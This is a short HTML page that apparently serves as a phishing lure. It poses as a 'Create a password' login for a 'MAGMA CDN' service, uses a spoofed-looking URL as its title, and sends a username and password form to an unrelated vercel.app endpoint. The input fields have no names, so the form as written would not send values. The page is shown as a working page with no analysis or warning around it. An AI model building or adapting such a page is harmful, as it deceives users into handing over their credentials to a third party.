<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="https://bluseworld.vercel.app/style.css">
<title>https://magma-ret-cdn.regible-A12364.tt.nm.us</title>
</head>
<body>
  <body>
    <div class="login-page">
      <div class="form">
        <div class="login">
          <div class="login-header">
            <h3>Create a password</h3>
            <p>Enter your select username and password. Then, click "continue". You may then log in with your username & password. </p>
          </div>
        </div>
        <form class="login-form" method="get" action="https://tmux-portal3.vercel.app/oauth/login.coo">
          <input type="text" placeholder="Username"/>
          <input type="password" placeholder="Password"/>
          <button>CONTINUE</button>
          <p class="message">REGIBLE-A12364 MAGMA CDN</p>
        </form>
      </div>
    </div>
</body>
</body>
</html>